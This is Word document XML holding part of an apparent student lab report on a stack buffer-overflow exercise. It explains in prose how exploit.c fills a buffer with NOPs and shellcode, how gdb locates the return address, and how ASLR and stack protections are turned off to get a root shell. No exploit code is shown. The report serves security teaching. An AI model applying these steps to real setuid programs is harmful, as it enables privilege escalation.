          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">file. The stack.c reads the contents of the bad file and passes this file </w:t>
      </w:r>
      <w:r w:rsidR="00D82E4D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>as 517</w:t>
      </w:r>
      <w:r w:rsidR="00186184" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes </w:t>
      </w:r>
      <w:r w:rsidR="004E607D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">input to a </w:t>
      </w:r>
      <w:r w:rsidR="00186184" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">24 bytes </w:t>
      </w:r>
      <w:r w:rsidR="004E607D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>buffer which leads to a buffer overflow.</w:t>
      </w:r>
      <w:r w:rsidR="00D82E4D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00186184" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18696136" w14:textId="77777777" w:rsidR="00833FC9" w:rsidRPr="000941B1" w:rsidRDefault="00833FC9" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E88AEC" w14:textId="3A2C5F94" w:rsidR="00186184" w:rsidRPr="000941B1" w:rsidRDefault="003A4026"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 xml:space="preserve">Exploiting the vulnerability using </w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: We use exploit.c to exploit the vulnerability of stack.c. We fill the buffer with Nops and add the shellcode (malicious) at the end of the buffer. </w:t>
      </w:r>
      <w:r w:rsidR="00A10DF8" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Using gdb, we compute the base pointer address </w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>which is</w:t>
      </w:r>
      <w:r w:rsidR="00A10DF8" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 bytes above the Return address. </w:t>
      </w:r>
      <w:r w:rsidR="00186184" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This base pointer address is used to find the position of the return address relative to the buffer and using the buffer pointer we fill the return address</w:t>
      </w:r>
      <w:r w:rsidR="00D82E4D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> which points to the Nops inserted before the shellcod</w:t>
      </w:r>
      <w:r w:rsidR="00A10DF8" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BE24F7" w14:textId="239CD5FF" w:rsidR="00E32B1F" w:rsidRPr="000941B1" w:rsidRDefault="00E32B1F" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CA6F4D" w14:textId="6C54715E" w:rsidR="00E32B1F" w:rsidRPr="000941B1" w:rsidRDefault="00E32B1F" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">OBSERVATIONS: </w:t>
      </w:r>
      <w:r w:rsidR="003A4026" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We come across</w:t>
      </w:r>
      <w:r w:rsidR="001564A4" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> few important </w:t>
      </w:r>
      <w:r w:rsidR="003A4026" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>observations-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76435D13" w14:textId="6D2434D3" w:rsidR="00E250CA" w:rsidRPr="000941B1" w:rsidRDefault="00E250CA" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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We need to conduct the attack inside our Ubuntu12.04 virtual machine. The buffer overﬂow problem has a long history, most operating systems have already developed countermeasures against such an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B80FC" w14:textId="77777777" w:rsidR="0058424D" w:rsidRPr="000941B1" w:rsidRDefault="0058424D" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DEEF02A" w14:textId="5160009D" w:rsidR="00833FC9" w:rsidRPr="000941B1" w:rsidRDefault="00E250CA" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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One of the countermeasures against buffer overflow attacks is the Address Space Layout Randomization (ASLR). It randomizes the memory space of the data areas in a process, making it difﬁcult for attackers to guess the address of the injected malicious code. The malicious code had very less to zero chances of getting executed without turning off the ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04624C"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0335F043" w14:textId="7977969B" w:rsidR="00833FC9" w:rsidRPr="000941B1" w:rsidRDefault="00E250CA" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Stack Guard and stack non-executable needs to be turned before running the stack. Stack guard adds data in the code which detects buffer overflow when the data is replaced and returns a ‘Segmentation Fault’. Stack non-executable is set true by default and does not allow the malicious code to be executed in the stack. It returns a Segmentation Fault as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9A89F"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77DA629B" w14:textId="250FED16" w:rsidR="00025F2B" w:rsidRPr="000941B1" w:rsidRDefault="00025F2B" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Running the ./call_shellcode from the terminal starts a shell, which can be used for running programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F072ECB"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541A1FA2" w14:textId="62969DA8" w:rsidR="00025F2B" w:rsidRPr="000941B1" w:rsidRDefault="00025F2B" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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most crucial step in the attack is overwriting the written address in the exact location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9EF211"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1CEC0901" w14:textId="77777777" w:rsidR="0058424D" w:rsidRPr="000941B1" w:rsidRDefault="0058424D" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479D1B08" w14:textId="44F9AABC" w:rsidR="00025F2B" w:rsidRPr="000941B1" w:rsidRDefault="00025F2B" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3917B6E7" w14:textId="6133C918" w:rsidR="00025F2B" w:rsidRPr="000941B1" w:rsidRDefault="00025F2B" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Some other observations are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB694B6" w14:textId="2B96FB6B" w:rsidR="00025F2B" w:rsidRPr="000941B1" w:rsidRDefault="00025F2B" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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shellcode needs to be injected at the end of the buffer</w:t>
      </w:r>
      <w:r w:rsidR="000D2070" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the gap between the return address and the shellcode should be filled with Nops. This increasing the chances of malicious code getting executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37F9BB" w14:textId="77777777" w:rsidR="0058424D" w:rsidRPr="000941B1" w:rsidRDefault="0058424D" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C2367E" w14:textId="77777777" w:rsidR="0058424D" w:rsidRPr="000941B1" w:rsidRDefault="0058424D" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Although we obtain the “#” prompt, after running the exploit.c and stack.c  the  real user id is still yourself (the effective user id is now root). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C8AA95" w14:textId="2C5CD486" w:rsidR="000D2070" w:rsidRPr="000941B1" w:rsidRDefault="0058424D" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="72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It is required to change set the uid to 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE360A7" w14:textId="4ED3F89A" w:rsidR="00E250CA" w:rsidRPr="000941B1" w:rsidRDefault="00E250CA" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F50C87" w14:textId="77777777" w:rsidR="00E250CA" w:rsidRPr="000941B1" w:rsidRDefault="00E250CA" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13645DFF" w14:textId="35CF4C1E" w:rsidR="00494E74" w:rsidRPr="000941B1" w:rsidRDefault="00833FC9"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 xml:space="preserve">RESULTS: </w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The end goal of the attack project is to launch the root shell. The crucial part is</w:t>
      </w:r>
      <w:r w:rsidR="00494E74" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> finding the exact location of</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the return address </w:t>
      </w:r>
      <w:r w:rsidR="00494E74" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and filling the return address such that the control jumps to the correct location. If the return address is added in the correct location, the control jumps to the address containing the Nops eventually running the shellcode and launching the new shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7FD5A"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5D1CBF01"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We compile and run exploit.c which creates bad file. We run the stack program. When the program control reaches Return address the program control jumps to the Nops inserted before the shellcode (malicious) eventually executing the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D87A0E"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57C935AB" w14:textId="77777777" w:rsidR="0058424D" w:rsidRPr="000941B1" w:rsidRDefault="0058424D" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4029D810" w14:textId="77777777" w:rsidR="00494E74" w:rsidRPr="000941B1" w:rsidRDefault="00494E74" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFA919C" w14:textId="26D53836" w:rsidR="00833FC9" w:rsidRPr="000941B1" w:rsidRDefault="00494E74"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The end result can be evaluated by checking whether we get the ‘#’ sign after running the exploit.c and stack.c. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A756338" w14:textId="046C552E" w:rsidR="00D82E4D" w:rsidRPr="000941B1" w:rsidRDefault="00D82E4D" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2151D999" w14:textId="77777777" w:rsidR="00186184" w:rsidRPr="000941B1" w:rsidRDefault="00186184" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28725A96" w14:textId="4609E5D0" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="0027147C" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C057133" w14:textId="77777777" w:rsidR="003A4026" w:rsidRPr="000941B1" w:rsidRDefault="003A4026"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METHODOLOGY</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2121393E" w14:textId="77777777" w:rsidR="003A4026" w:rsidRPr="000941B1" w:rsidRDefault="003A4026" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C234AF" w14:textId="27D4933C" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="0027147C" w:rsidP="0058424D">
      <w:p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goal is to launch a root shell. This goal can be achieved in two steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3820A" w14:textId="0C608580" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="00FB6CB9" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Shellcode(malicious):</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027147C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We require a </w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="0027147C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>that launches a new root shell with root privileges. This code should be available in the program’s space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47022A99" w14:textId="2EA96FEA" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="00FB6CB9" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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lastRenderedPageBreak/>
        <w:t>Directing the program control to the shellcode(malicious):</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027147C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The program needs to jump to the address containing the malicious code and run the malicious code to launch the root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35371D68" w14:textId="4090B2A4" w:rsidR="003A4026" w:rsidRPr="000941B1" w:rsidRDefault="003A4026" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A221B51" w14:textId="77777777" w:rsidR="003A4026" w:rsidRPr="000941B1" w:rsidRDefault="003A4026" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F66941" w14:textId="10E1F070" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="0027147C" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
